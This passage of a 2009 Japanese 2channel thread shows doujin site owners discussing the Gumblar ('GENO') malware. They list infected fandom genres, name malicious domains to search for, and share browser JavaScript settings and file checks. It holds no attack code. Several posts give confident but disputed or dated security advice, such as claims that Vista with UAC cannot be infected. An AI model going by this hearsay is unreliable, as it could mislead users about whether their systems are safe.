男性向けはニュース系で見て自分は知っていても閲覧者向けの告知はしない悪寒

379 :GENO:2009/05/16(土) 15:49:32 ID:SdXMuhFV0
gumblar.cnの代わりにmartuz.cnが出てきた模様
ソースはatwordのブログ

>>200のような方法で確認しているひとは
gumblar.cnの他にmartuz.cnも検索したほうがよさげ


あと尼も感染とか嘘情報を書き込んでる人は
逮捕とか損害賠償とかの可能性があるからね
確認もせずに騒いだらだめだよ

380 :GENO:2009/05/16(土) 15:49:52 ID:bmeWatfA0
>>372
絶対このサイトは感染してないから大丈夫!
または感染してもいいと思うならonにしておけば?

381 :GENO:2009/05/16(土) 15:50:54 ID:9Ys2SJeo0
今んとこ静的なhtmlにしか感染してないっぽい

382 :GENO:2009/05/16(土) 15:51:32 ID:V9V0BvaO0
>>377
ウィルスの特徴考えれば絵板やあぷろだは今のところ大丈夫では?


383 :geno:2009/05/16(土) 15:51:46 ID:GRX8bIuu0
ごめんこういうの全く疎いからわかんないんだけど、
PDFとかPSPとかでも感染するの?

384 :GENO:2009/05/16(土) 15:52:03 ID:cdvZ3AuZ0
>>374
特撮の電凹の後ろに(○年仮面バイク乗り)とか書いておいたら?

仮面はペルソナの伏せ字で大量に使用されてるから今さらだと思うし

385 :GENO:2009/05/16(土) 15:52:43 ID:EM/BIfU/0
>>374
「01特撮」は特撮ジャンル的に「2001年に放送された特撮番組」という意味なので
誤解が生じます
特撮の前や後に数字が付く表記の仕方は避けていただきたいです

386 :GENO:2009/05/16(土) 15:53:07 ID:5dy38PGO0
>>382
この状況を考えると、下手に大丈夫という言葉を出すと曲解されそうでこわい

387 :GENO:2009/05/16(土) 15:53:10 ID:TV+NV+ev0
自サイトからまとめにリンクしてもいいのかね?

388 :GENO:2009/05/16(土) 15:53:23 ID:oQ1szY8z0
>>10の方法で確認しても、感染しちゃってる人いるみたいだから、
この方法を感染の確認方法として掲示しとくのは危なくない?
>10だけやって、自分は大丈夫だと管理人さんが安心しちゃうと困る。

>10の方法はあくまで第一段階の確認方法で、
Kaspersky、ニフティオンラインスキャン、avast!、ウイルスバスタ2009の
いずれかで必ずウィルススキャンをしてください、とまとめサイトと
次スレの注意事項で書いてほしい。

389 :GENO:2009/05/16(土) 15:53:27 ID:V9V0BvaO0
>>374
昨日から思ってるがナンバリングはいらなくないか?
何の順番かと気になるし、・とかで並列にしないか

390 :Geno:2009/05/16(土) 15:53:48 ID:zjPe21rnO
すいません
WORM_HIDERUN.ABって出たんだけどこれは別のウィルスですかね?


391 :GENO:2009/05/16(土) 15:53:54 ID:yicyznBmO
とりあえずPCと自サイトはセーフだったけど終息するまではPCつけないほうがよさそうだね
日記で注意喚起してPC消しました
早く終息しますように

392 :geno:2009/05/16(土) 15:53:54 ID:Uh4LqZktO
先月22日に自分が感染して、mixiで注意勧告をしたんだがマイミク総スルー。
日本人の平和ボケは自分の身に直接危機が及ばないと気が付かない最悪レベル。
先日のテポドンの騒ぎで良く判ったよ。

393 :GENO:2009/05/16(土) 15:54:08 ID:JLSn9lA+0
>>387
俺リンクしたよ

394 :GENO:2009/05/16(土) 15:54:52 ID:58PrCe2G0
伏字解る範囲でやめてみた。補足とかあったらよろしく
-----
同人サイトなどへの感染例が報告されたジャンル一覧。サーチや情報サイトなどの閲覧者多数による被害拡大が予測される場合、特に()内に記載。

■アニメ系
01エヴァ(小説サーチ) / 02忍たま乱太郎 / 03ガンダム00 / 04プリキュア / 05天体戦士サンレッド /06コードギアス / 07レッツ&ゴー / 09イナズマイレブン

■少年漫画【週刊飛翔系】
01リボーン(プチオンリー告知サイト・ファンサイト) / 02テニミュ(ファンサイト) / 03ジョジョの奇妙な冒険 / 04ワンピース /
05デスノート / 06D.Gray-man / 07遊戯王無印
■少年漫画【その他】
01鋼の錬金術師(オンリー告知サイト) / 02コナン
■青年漫画
01ヘタリア (PCサーバ使用の携帯向け同盟)/ 02おお振り(アンソロ告知サイト) 03福本:越境、銀金

■ゲーム【RPG、ACT】
01幻想水滸伝 / 02戦国BASARA(アンソロ告知サイト) / 03戦国無双 / 04バイオハザード
05メガテン:真、サマナー、ライドウ、P4 / 06、テイルズオブ:ジアビス / 07セブンスドラゴン
■ゲーム【乙女、BL、男性向け】
01Vitamin シリーズ/ 02遙かなる時空の中で / 03Starry☆Sky / 04クインロゼ / 05薄桜鬼
01ニトロプラスキラル:咎狗の血(アンソロ告知サイト)
01Fate / 02ひぐらし
■ゲーム【格闘,アーケード,その他】
01ポップンミュージック / 02東方 (超大手感染情報) / 03ブレイブルー

■小説・ライトノベル - 01小野不由美(サーチ)
■創作 - 01創作小説 / 02創作同人ゲーム /03オリジナルJUNE
■その他 - 01特撮:仮面ライダー電王

■その他の接触確率の高そうな報告例
01非同人系ゲーム同盟サイト / 02模型イベントホビーコンプレックス告知サイト

395 :GENO:2009/05/16(土) 15:55:36 ID:b0KR6SMd0
>>383
日本語でおk

396 :GENO:2009/05/16(土) 15:56:10 ID:dUhoo+Zw0
>>378
だからこそ、サイト持ちはガンガン告知したらいいと思う。
皆が告知してれば、誰がねらーなのかも分からなくなるし。

幸がまだ警告上げてないジャンルは厳しいかもしれんが
幸が警告してくれてるジャンルのサイト持ちは、啓蒙していって欲しい。

自分の好きなサイト管理人が呼び掛けていたら
興味の薄い人も、危機感持ってくれるかもしれないし

397 :geno:2009/05/16(土) 15:57:17 ID:cleS48FZ0
自分もとあるジャンルのSNSで注意喚起をしてみたけど、
絵とか載せたときの足跡に比べたらまだ10以下とかね
やっぱりというか、みんな読んでくれないね

398 :GENO:2009/05/16(土) 15:57:22 ID:gv1evCKXP
activexも気ってい置いた方が無難?

399 :geno:2009/05/16(土) 15:58:00 ID:rHuvw5CU0
ネットせずに今のうちに絵やテキストを書き溜めておくが吉

400 :GENO:2009/05/16(土) 15:58:08 ID:gv1evCKXP
キーボードの電池切れかけで入力おかしすw
改めて・・・

activexも切っておいた方が無難?

401 :geno:2009/05/16(土) 15:58:31 ID:DBET/QmP0
自分もサイトに注意喚起文とまとめサイト貼ってきたけど
(もともとねらバレしてるし)
ピコサイトじゃ注意喚起の意味ないかもなぁ。

幸管さんが注意文なんかをのせてくれると、影響力あると思うんだけどね…

402 :GENO:2009/05/16(土) 15:59:20 ID:Gh3ZB53n0
同人サイトなどへの感染例が報告されたジャンル一覧。サーチや情報サイトなどの閲覧者多数による被害拡大が予測される場合、特に()内に記載。

■アニメ系
エヴァ(小説サーチ) / 忍たま乱太郎 / ガンダム00 / プリキュア / 天体戦士サンレッド / コードギアス / レッツ&ゴー / イナズマイレブン

■少年漫画【週刊飛翔系】
リボーン(プチオンリー告知サイト・ファンサイト) / テニミュ(ファンサイト) / ジョジョの奇妙な冒険 / ワンピース /
デスノート / D.Gray-man / 遊戯王無印
■少年漫画【その他】
鋼の錬金術師(オンリー告知サイト) / コナン
■青年漫画
ヘタリア (PC鯖使用の携帯向け同盟)/ おお振り(アンソロ告知サイト) 福本:越境、銀金

■ゲーム【RPG、ACT】
幻想水滸伝 / 戦国BASARA(アンソロ告知サイト) / 戦国無双 / バイオハザード / セブンスドラゴン
メガテン:真、サマナー、ライドウ、P4 / テイルズオブ:ジアビス
■ゲーム【乙女、BL、男性向け】
Vitamin / 遙かなる時空の中で / Starry☆Sky / クインロゼ / 薄桜鬼
ニトロプラスキラル:咎狗(アンソロ告知サイト)
Fate / ひぐらし
■ゲーム【格闘,アーケード,その他】
ポップンミュージック / 東方 (超大手感染情報) / ブレイブルー

■小説・ライトノベル - 01小野不由美(サーチ)
■創作 - 創作小説 / 創作同人ゲーム / オリJUNE
■その他 - 特撮:電凹 ※生モノ伏字

■その他の接触確率の高そうな報告例
非同人系ゲーム同盟サイト / 模型イベントホビーコンプレックス告知サイト

403 :GENO:2009/05/16(土) 15:59:27 ID:GLZx1iQeO
普通にサイト回っててパソコンがおかしな動きしたらおかしいと思うだろ

どうりで最近ネットしてると強制終了ばっかなんだと思ってたし
ネラーとか思う方がネラーだ

404 :GENO:2009/05/16(土) 15:59:30 ID:oRZKM7s90
幸は自分もいくつか警告文出した。
けど1つだけしか反応してくれなかったし、管理人自体がサボリきみだしな・・。
そこ全部利用者数がすごいのに。

405 :g:2009/05/16(土) 15:59:41 ID:PCjrz9n10
>>392
いち一般人が勧告したどころでそんなもんだ
あんただって自分が感染しなきゃそういう反応だよ
大きく認知されるように知った人がこつこつやるしかない

406 :GENO:2009/05/16(土) 16:02:31 ID:vdqvVnja0
同人系SNSである程度情報選別して載せた上で注意喚起したら
何人かは読んでくれてたみたいなんだけど、いまいち危機感はない。mixiはマイミク総スルーだ。
ねらーだというのがバレて後ろ指さされるより感染者増やすほうがよっぽど嫌なので
早々にまとめサイトへの誘導書かせてもらった。

各ジャンル大手サーチが注意喚起してくれたらいいんだがな…。
実際大多数のジャンルで感染確認されてるし

407 :GENO:2009/05/16(土) 16:03:48 ID:hGkLsLkD0
ヘタリアは普通のファンサイトでの感染も確認されてなかった?
あとGENOか解らないがアンソロサイトでトロイの反応あったってちょっと前にジャンルスレで言われてたよ

408 :GENO:2009/05/16(土) 16:04:04 ID:b/+eltGS0
mixiの日記新着でけっこう注意喚起されてたから効果あるんじゃ?

409 :GENO:2009/05/16(土) 16:04:35 ID:ECMhfWuK0
自ジャンルの最大サーチさんは今朝方には注意喚起してくれてた
自分もそれで気がついたんだが…
若い人が多いジャンルなんで本当ありがたいよ

410 :GENO:2009/05/16(土) 16:05:01 ID:5YFx+VE/0
バスター2009もウィルスチェッカーとして
信用していいの?バスターは検出されないんじゃなかった?


411 :GENO:2009/05/16(土) 16:06:09 ID:7pt9jFIj0
今更聞けない
これ、マカーは関係ないの?

412 :GENO:2009/05/16(土) 16:06:55 ID:BpSFSHPIO
こんな時に限って宛にならないマカフィー…orz

413 :geno:2009/05/16(土) 16:07:20 ID:g9sbzZS40
Wikiの感染ジャンル、
平成バイク乗りってまた同人板用語になってる…。
同人板にどっぷり漬かってると気付きにくいもんなのかね。

414 :GENO:2009/05/16(土) 16:07:43 ID:/ifCeInG0
詳しくないから知らんけど
巡回ソフト使ってる人ってヤバいんじゃないの?

415 :GENO:2009/05/16(土) 16:08:44 ID:ps5/AV/I0
報告されてる感染ジャンル数現在およそ[43]

■アニメ系[8]
■少年漫画/ジャンプ系[7]
■少年漫画/その他[2]
■青年漫画[3]
■ゲーム/RPG、ACT[7]
■ゲーム/乙女、BL、男性向け[8]
■ゲーム/格闘,アーケード,その他[3]
■小説・ライトノベル [1]
■創作 [3]
■特撮[1]

416 :GENO:2009/05/16(土) 16:09:46 ID:JLSn9lA+0
もうね、いっそウィルス注意文更新しました!って理由で幸上げしたくなってきた
やらないけど

417 :GENO:2009/05/16(土) 16:10:31 ID:Rpbihy850
>>411
ログをよく読む

418 :GENO:2009/05/16(土) 16:10:47 ID:hJKQqJXs0
同人関連とか扱うサイト持ってるからウイルスについてちょっと警告っぽいもの書いてみたけど
すでに自分のサイトが感染してたらどうすっべか

419 :geno:2009/05/16(土) 16:11:13 ID:zlsW0HIw0
ねらーバレするのが嫌だという人は「友達から聞いて」「ネットサーフしてて知った」でいいと思う
リアの友人から聞いたというなら確認する術なんてない
自分の場合は大体それで通してるな

420 :GENO:2009/05/16(土) 16:11:19 ID:fDsTg4Q/0
>>411
今の所は
でもmacスレでも警戒はしてるよ

421 :geno:2009/05/16(土) 16:11:22 ID:cleS48FZ0
女の人が多いジャンルが多いのかな
男性はあんまりこう言うので騒がないイメージもあるけど
ジャンル見てると人口多いからといって感染増えてるってわけでもないのかな

422 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:11:23 ID:niiz+o530
Win98の場合は関係なし?


423 :GENO:2009/05/16(土) 16:11:26 ID:JJXVNcG60
うちのジャンルは早い段階で大手がまとめにリンク貼ってるから、後からの人も貼りやすいみたいだ


424 :GENO:2009/05/16(土) 16:11:48 ID:5dy38PGO0
>>418
感染してるかどうかを見ろよ…
そしてPCを窓から(ry

425 :げの:2009/05/16(土) 16:11:56 ID:24pd1kkFO
ファイアウォールのネットワーク接続の設定で
FTPサーバーも追加した方が良いんだろうか?

426 :GENO:2009/05/16(土) 16:12:20 ID:AJDusmZN0
名前はダウンアドに決定しました

亜種が続々と誕生、ウイルス「ダウンアド」に注意 : ニュース : ネット&デジタル : YOMIURI ONLINE(読売新聞)
http://www.yomiuri.co.jp/net/news/20090508-OYT8T00681.htm

改ざんサイトに埋め込まれる「JS_AGENT.AVR」が4位 - トレンドマイクロ週間ランキング:Security NEXT
http://www.security-next.com/010425.html

「USBウイルス」の感染報告が9カ月連続で最多、「ダウンアド」も増加中:ITpro
http://itpro.nikkeibp.co.jp/article/Research/20090508/329700/

427 :geno:2009/05/16(土) 16:12:32 ID:TiRh0n3E0
感染してなくても、しばらくftp使用を避ける=更新自粛
こうしたほうがいいってことかね
ブログでも借りてそっちで更新した方が、ftpも使うより危険性は低いって事で大丈夫?


428 :GENO:2009/05/16(土) 16:12:45 ID:Qyk8RTLY0
全スレでメガテン同人サイトの報告をあげてくださった方

おそらく注意喚起用のトップページだけ残して他を削除された
当該ジャンルサイトの管理者さんだと思うのですが
連絡方法がないので一縷の望みをかけてコチラへ。

トップページに一夜にしてそれっぽいJavaScriptが書き込まれています。
もしもココを見てられたら、おかげで事態を把握できた面もありとても残念ですが
そのページも削除したほうがいいような気がします。

チラ裏/マカフィが未明のアップデートで少し賢くなったのか、アラートが出ました。

429 :げの:2009/05/16(土) 16:12:50 ID:oMgh2Y8xO
>>378
本当にそんな下らない足の引っ張り合いしてるジャンルはマイジャンルサイトが軒並み閉鎖
ジャンル衰退コンボの憂き目を見るといいと思う

俺はネラバレしようが注意喚起してマイジャンルを護るぜ
といっても注意を促して他管理人と閲覧者が自ら動いてくれることを祈るしかできないけどね

430 :GENO:2009/05/16(土) 16:13:09 ID:ZjGJKiW50
>>421
女性はそもそもPC関係に詳しくない人多いからね
男性でオタクの人はPC自作したり自鯖立てたりと色々詳しい人が多いから

431 :GENO:2009/05/16(土) 16:14:00 ID:Q3syTjec0
>>411
今のところは大丈夫だが、サイト持ちだったら人ごとじゃない。
自サイトが改竄されてないかチェックが必要。

432 :GENO:2009/05/16(土) 16:14:01 ID:bmeWatfA0
>>421
案外気がついてない場合が多い気がする。
そして拡大。

433 :2:2009/05/16(土) 16:14:43 ID:n/uQJHr/0
>>2ですどうも。
感染前対策のブラウザについて、以下でいいか見てほしいです

●ブラウザのjavascriptを無効にする
・IE ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ→
 スクリプトのとこ全部無効にチェック(ブラウザ再起動をしないと適用されない)
・Opera ツール→クィック設定
・Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす

>>379情報追加しました

>>413
前スレで書いたんだけどこちらではそのジャンルスレまで確認にはいけないので
このスレで報告された通り「平成バイク乗り」としか書けない
>402では電凹となってるけど、このスレで作品名は出てないんで自分には判断ツカネ
ジャンル者さんなどで>>2にアンカつけて報告してくれると助かるんだが

434 :GENO:2009/05/16(土) 16:16:02 ID:x0bCDYWh0
>>415
テニミュは正確にいうならジャンプ系でなくて
生ジャンルに入ると思うけどね

435 :GENO:2009/05/16(土) 16:16:44 ID:+XyjabnD0
>>421
確かに感染上位は腐に人気の作品ばかりだな

436 :ゲノ:2009/05/16(土) 16:16:58 ID:CUJIuIlLO
vistaもsqlなんとか調べればいいの?

437 :gEの:2009/05/16(土) 16:17:45 ID:Rk4HGBBq0
>>434
細かいカテゴライズが重要か?ええ?

438 :GENO:2009/05/16(土) 16:18:13 ID:GlNn33WjO
質問です
やはりWEB拍手も感染した状態でお礼画面とか編集したらやばい…?

439 :Geno:2009/05/16(土) 16:18:13 ID:HJwFPOpeO
>>298
ありがとう

440 :geno:2009/05/16(土) 16:18:23 ID:jltvO58t0
Serena Bachのテンプレート使ってて、全てWeb上で更新してるのは
今のところ安心かな。

441 :geno:2009/05/16(土) 16:18:27 ID:Lbb6ogft0
>>436
wiki読めよ

Vistaユーザー
「C:\Windows\Help\mui」以下のディレクトリにsqlsodbc.chmが存在する
sqlsodbc.chm を右クリック→プロパティでボリュームが確認できます
1個のファイル 50,727バイト と表示されればOK

442 :GENO:2009/05/16(土) 16:18:50 ID:ps5/AV/I0
>>434
貼られてるのを数えただけだからそこまで知らんよ
総数あった方が増え方が解りやすいかと思っただけ

443 :GENO:2009/05/16(土) 16:19:12 ID:5dy38PGO0
>>438
むしろなぜ感染した状態で編集しようと思うのか理解に苦しむ

444 :だうん?げの?:2009/05/16(土) 16:19:28 ID:KBaZxwMuO
>>426
次スレから名前ダウンアドにした方がいいのか?

445 :GENO:2009/05/16(土) 16:19:48 ID:cN6MMg830
>>2
お疲れ様です。

●ブラウザのjavascriptを無効にする に
・safari 編集→設定→「JavaScriptを有効にする」のチェックを外す

を追加お願いします。

446 :奈々氏:2009/05/16(土) 16:19:59 ID:7pKgcOXpP
sqlsodbc.chmは読み取り専用にしても無駄なの?

447 :ゲノ:2009/05/16(土) 16:20:13 ID:CUJIuIlLO
>>441
ありがとう
大丈夫だった

448 :geno:2009/05/16(土) 16:20:41 ID:Gum4Umtn0
今の所ボカロの被害報告は無いっぽいな
女性向けの法則が成り立つならカイト辺りやばそうだけど

449 :geno:2009/05/16(土) 16:20:48 ID:sfcpFjSkO
実際のサイトは未確認だけど
「隠の王」の同人サイトも感染したという書き込みがあった

ただあそこは今ものすごい荒れてるから、
注意喚起しようものならそれこそねらーwと叩かれる確率高
もし本当に感染してたらヤバいな

450 :GENO:2009/05/16(土) 16:20:52 ID:GlNn33WjO
>>443
いや、感染はしてないんだが念のため…

451 :GENO:2009/05/16(土) 16:21:11 ID:Lbb6ogft0
>>446
そもそもsqlsodbc.chmを改ざんされないことが重要なわけではない

452 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:22:27 ID:A9qSW+uH0
男は無頓着な場合も多いんだよ

女はおおげさだなーw
セキュリティソフト入れてるから大丈夫だよw
感染しても、パスワードもれて困るようなこと別にないしw

こういうのがザラにいる…

453 :奈々氏:2009/05/16(土) 16:22:45 ID:7pKgcOXpP
>>451
そうですか、何か予防法はないんでしょうか?

454 :GENO:2009/05/16(土) 16:22:55 ID:59HDbR2U0
感染確認した、小波音ゲー系サイト
ポップンミュージック以外にもビートマニアUDXで感染している
サイトがあった
あと小波音ゲーまとめて取り扱っているサイトも感染しているところが
ある。連絡してみたが反応ないわー被害増えそう

455 :geno:2009/05/16(土) 16:22:55 ID:BxZlhYcI0
>>421 >>378の可能性も
男性向けは補足サイトが充実してるから
感染サイトが更新→補足→アクセス集中して拡大…とかありそう

456 :GEKO:2009/05/16(土) 16:23:29 ID:0EwH0zuu0
こういうウイルス作るバカはなにがしたいんだ?

457 :GENO:2009/05/16(土) 16:23:47 ID:VErwZiUS0
このスレを今まさにIEで開けてしまったんだが大丈夫だよな…?

458 :GENO:2009/05/16(土) 16:23:50 ID:dUhoo+Zw0
>>453
スレ全部読め

459 :ゲノ:2009/05/16(土) 16:23:57 ID:I91bK8ouO
さっきから対策Wikiへのリンク張ろうとすると投稿はねられるんだが
板の設定かえられた?気のせい?


460 :確認。:2009/05/16(土) 16:24:06 ID:rISkosAEO
感染確認のため携帯から…orz

ロースペな奴ならPCが明らかに重くなるからわかりやすいかも。

461 :GENO:2009/05/16(土) 16:24:05 ID:uACsvbNb0
>>433
OperaそれでOKです。

細かく書くと
ツール→クイック設定→「javascriptを有効にする」のチェックを外す

462 :GENO:2009/05/16(土) 16:24:14 ID:gv1evCKXP
ノートン先生、そろそろ空気読んでください
マジで・・・・
せっかっく、激軽になって快適性でバスター先生を大幅に上回ったのに
対応が甘いのでは意味がない

463 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:24:38 ID:HROEC40oP
Vistaだったら sqlsodbc.chm が弄られることはないから
確認する必要もないんだけどね。
試しに自分で sqlsodbc.chm を削除や移動しようとしてもUACで止められるはず。
UACを有効にしている限り感染はしないし亜種が出ても大丈夫。

464 :geno:2009/05/16(土) 16:24:41 ID:cleS48FZ0
>>448
あの界隈はそれこそSNSとか多いから注意はまわってるのかも
見た訳じゃないから知らんけど

465 :geno:2009/05/16(土) 16:24:42 ID:5qGyw+II0
>>457
いいから専ブラいれとけ

466 :GENO:2009/05/16(土) 16:24:44 ID:zlsW0HIw0
>>453
wiki読んで
でも100%の回避方法はない。ネット落ちするしかない

467 :GENO:2009/05/16(土) 16:24:47 ID:TV+NV+ev0
とりあえず自サイトってかブログのトップに警告文とまとめへリンク貼っておいた
被害拡大は勘弁だぜ

468 :GENO:2009/05/16(土) 16:25:21 ID:qYvQYDd+0
>>457
お前みたいなのは黙って窓からPCを投げ捨てるのが一番安全だと思う

469 :ゲノ:2009/05/16(土) 16:25:21 ID:KBaZxwMuO
>>456
ニートなんだろ、きっと

470 :GENO:2009/05/16(土) 16:25:30 ID:DLsCIqVo0
とりあえず>>10試してからsqlsodbc.chmが改ざんされてないことがハッシュ単位で確認できればセーフ?
普段js切ってるから大丈夫だとは思うんだけど……

471 :GENO:2009/05/16(土) 16:25:54 ID:7vPPIstBO
>>448
当該ジャンルの人が気付かないと報告されないからね。
報告がない=感染がないわけじゃない以上、報告来ない方がかえって怖い

472 :感染:2009/05/16(土) 16:26:18 ID:rISkosAEO
>>463
俺はVistaで感染したぞ

473 :げの:2009/05/16(土) 16:26:33 ID:afm0lJ4jO
ノートン一年更新したばっかなのになんてこったw

474 :geno:2009/05/16(土) 16:27:07 ID:g9sbzZS40
>>433
いやいや平成バイク乗りのどれかを特定しろってことじゃなくてね。
平成仮面ライダーと書くべきじゃないかってこと。
バイク乗りで一般の人は仮面ライダーだってわからないと思うよ。

475 :GENO:2009/05/16(土) 16:27:28 ID:/m6gQ1ZiP
>>472
なんで感染したか軽くお願いできます?

476 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:27:28 ID:HROEC40oP
>>472
だからそれはUACを無効にしていたんだろ。
あるいはUACが有効になっていたのなら感染しているということ自体勘違い。

477 :GENO:2009/05/16(土) 16:27:32 ID:UzmDldtu0
>>413
特撮はジャンルの性質上、作品の正式名称書かないで伏字推奨なんだよ
特撮に限らず芸能系の生サイトも伏字推奨だし
だから「平成バイク乗り」表記のままでも別にいいと思う

>>449
隠の王には粘着荒らしが居て
自分の気に入らないカップリングのサイトを荒らし回ってるらしいからな…
確かに注意喚起は難しいかも

478 :奈々氏:2009/05/16(土) 16:27:38 ID:7pKgcOXpP
>>466
ありがとうございました



JavaScript解除したらレスのポッポアップが使えなくなった
かなり読みづらい

479 :geno:2009/05/16(土) 16:27:41 ID:TiRh0n3E0
>>427の解釈ってあってる?

480 :GENO:2009/05/16(土) 16:27:42 ID:+bxNWFSA0
>>444
本スレがGENOだからGENOで統一しないと混乱する
この名前はもう長い事使われてるし、向こうに合わせれば?
ていうかダウンドア別物じゃね?

481 :GENO:2009/05/16(土) 16:27:57 ID:dr5UDej90
wiiとかPSPで閲覧しても感染する?

482 :GENO:2009/05/16(土) 16:27:57 ID:OCIxdqMP0
乙女ゲーム「金色のコルダ」二次サイト
管理人が感染に気付いてサイト閉鎖を行ったけど、
跡地の挨拶ページが改ざんされてる。
連絡先が書かれていないので知らせられない。

483 :ゲノ:2009/05/16(土) 16:28:51 ID:/RDR3pK50
vista使いだけど
sqlsodbcはあるがsqlsodbc.chmがない…これはヤバい?

484 :GENO:2009/05/16(土) 16:28:53 ID:ACn1bXTV0
>>471
ジャンル人口がそこそこいないと感染に気付いてすらもらえないわけで…
人気作が上位にいるってのはそれだけ人口が多いってことだと。


485 :GENO:2009/05/16(土) 16:28:54 ID:KK8iCgsD0
GENOが検出できるウイルス対策ソフトって
・カスペルスキーオンラインスキャナ
・ニフティーオンラインウイルスチェック
と他なんだっけ?

486 :ウィルス:2009/05/16(土) 16:29:22 ID:ASxX8C7tO
ウィルスセキュリティの履歴に2009:4/14 、ユーザー=SYSTEM、 名前="GLH0054.TMP"、
説明=感染の割合Trojan-Downloder.Win32.Agent 状態=隔離、設定=アクセスは拒否されました
とあるんだけど、一通りマトメの対処をして、ウィルスセキュリティはウィルスを検知してたってことで、大丈夫と言うことですよね?

487 :GENO:2009/05/16(土) 16:29:32 ID:b/+eltGS0
>>482
鯖官に連絡じゃダメなのかね?

488 :GENO:2009/05/16(土) 16:29:33 ID:Lbb6ogft0
>>483
拡張子表示させてないだけじゃなくてか?

489 :げの:2009/05/16(土) 16:29:35 ID:xF88a00E0
>>472
UACを有効にしていて感染したのなら、
感染してどんな状態になったのか、そして
sqlsodbc.chmがどうなっていたのか教えてくれ



490 :GENO:2009/05/16(土) 16:29:45 ID:58PrCe2G0
>>482
そのサイトは幸とかに登録してない?
してたら幸管理人から連絡してくれと頼むといいかも
でもそれだと下手すりゃ幸がヤバイかも知れん

491 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:29:46 ID:HROEC40oP
>>483
単に拡張子が表示されてないだけで同じファイルだ。
何もヤバくない。
あと何度も言うけどVistaには感染しないから確認不要。

492 :GENO:2009/05/16(土) 16:29:46 ID:imGcngTF0
safariも「開発」のところでワンタッチでJAVAスクリプトON、OFF出来たはず。

493 :GENO:2009/05/16(土) 16:29:55 ID:uHPzWLxWO
連絡先がないサイトや連絡不通な感染サイトは
鯖元に通報

494 :GENO:2009/05/16(土) 16:30:14 ID:kCUb2De80
>>450
PCを大きめのカナヅチで思いっきり100回ぐらいあらゆる方面から叩けば
感染しないと思うよ^^

495 :GENO:2009/05/16(土) 16:30:32 ID:GfLVqANbO
>>483
フォルダオプションで、登録されている拡張子も表示に変更しろ

496 :GENO:2009/05/16(土) 16:30:34 ID:JLSn9lA+0
>>418
感染してるならまず対処の方(ファイル削除なりOS再インスコなり)が先かと
注意文は対処が終わって、IDやらパスやら変えて、それからだな

>>438
それは大丈夫なんじゃね? 絵茶と同じで

497 :GENO:2009/05/16(土) 16:30:39 ID:A9qSW+uH0
UACを盲目的に信じてる奴が一人いるなw

498 :GENO:2009/05/16(土) 16:30:41 ID:RUvUSgR60
>>483
拡張子も知らん厨房は回線切って寝とけ

499 :感染:2009/05/16(土) 16:30:59 ID:rISkosAEO
>>475
多分1週間位前にサイト回遊した時かと推測。
だがどこか具体的にはわからん

500 :GENO:2009/05/16(土) 16:31:03 ID:imGcngTF0
>>485
Avastもだったよ。

501 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:31:24 ID:EhrD1LC10
>>426,444
Downad(別名 Conficker)は、もう少し前からある別のウイルスだから、今回のとは関係ない。

502 :ゲノ:2009/05/16(土) 16:31:42 ID:/RDR3pK50
教えてくれた人ありがとう
今回初めてvistaでよかったと思った
でも自サイト持ってるしまだまだ不安だ

503 :GENO:2009/05/16(土) 16:31:47 ID:+bxNWFSA0
>>477
【ダブスタ】女性向け二次同人のローカルルールについて考える【矛盾】
http://changi.2ch.net/test/read.cgi/doujin/1225705312/l50

こんなときにお前何言ってんだ?伏字通すのと感染拡大防ぐのとどっちが大切だと思ってんだ


504 :げの:2009/05/16(土) 16:32:03 ID:xF88a00E0
>>483
右クリしてプロパティ見ろ。
コンパイルされた HTML ヘルプ ファイル (.chm)
って書いてあるだろ。

505 :GENO:2009/05/16(土) 16:32:13 ID:Ek5lef8G0
avast、ニフティ、システマックでスキャンしてみたけど検出なし
sqlsodbc.chm改ざんされた形跡なし
コマンドプロンプトレジストリ普通に出る
まとめサイトに書いてあることはだいたい試した
けどなんか動作が重い気がする…
亜種に感染してるんじゃないかという被害妄想が止まらない…


506 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 16:32:47 ID:yatpacPs0
>>497
別に盲信はしていないけど、少なくともWindowsフォルダ下のファイルが
UACに反応もせず書き換えられることは100%ありえないと断言できるからね。
こんなウイルスはUACがないXPや2kでしか存在しえない。

507 :GENO:2009/05/16(土) 16:32:57 ID:YtT8RKX90
つうか既に対策済みのサイトまで晒すなよ

508 :GENO:2009/05/16(土) 16:33:06 ID:j9r3b5ih0
>>480
別物だな。
GENOならHPを改ざんしたって記述があるはずだし。

509 :GENO:2009/05/16(土) 16:33:09 ID:cqXLXmwrO
疎くてすみません
Java切るといいなら、エチャ(タカミン)とかはどうなるの?

510 :GENO:2009/05/16(土) 16:33:24 ID:zlsW0HIw0
>>474
元ジャンルがわからないと平成バイク乗りも何を指してるのかわからない
故にそのまま転載せざるを得ない
原則は報告者は置き換えなしでジャンルを書く、
どうしても抵抗がある場合は一部○を使って伏字
わかる人はジャンルの訂正でいいのではないかと

511 :GENO:2009/05/16(土) 16:34:13 ID:ps5/AV/I0
>>474
いやだからこのスレで「平成バイク乗り」としか報告されてなかったから
2さんもそれが「仮面ライダー」だとわからなかったんだろ。
だから報告する時点で正確なジャンル名で報告してくれと。

512 :geno:2009/05/16(土) 16:34:22 ID:wh+11tX1O
ナマ半ナマはそもそも潜ってるんだし、特撮って事がわかれば十分じゃないか

513 :GENO:2009/05/16(土) 16:34:54 ID:UzmDldtu0
>>503
てかさ、同人サイト向けwikiなのになんで一般人にわからせる必要があるわけ?
ジャンルの人なら伏字でも意味通じるんだから別にいいと思うけど
それに特撮・芸能系サイトはパス制で検索避けしてるから普通はぐぐっても出てこないよ
一般人が辿り着く可能性は低い

514 :GENO:2009/05/16(土) 16:34:57 ID:I91bK8ouO
同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/

セキュ板本スレ
GENOウイルススレ ★5(実質6)
ttp://pc11.2ch.net/test/read.cgi/sec/1242415108/



515 :GENO:2009/05/16(土) 16:35:04 ID:JLSn9lA+0
>>509
使用不可になる。多分。
それが嫌なら、絵茶だけ許可にするとかな。
ただし、それでもし絵茶提供側がウィルス感染しても知らんよ、ってこってす

516 :GENO:2009/05/16(土) 16:35:15 ID:5dy38PGO0
>>503
だよな
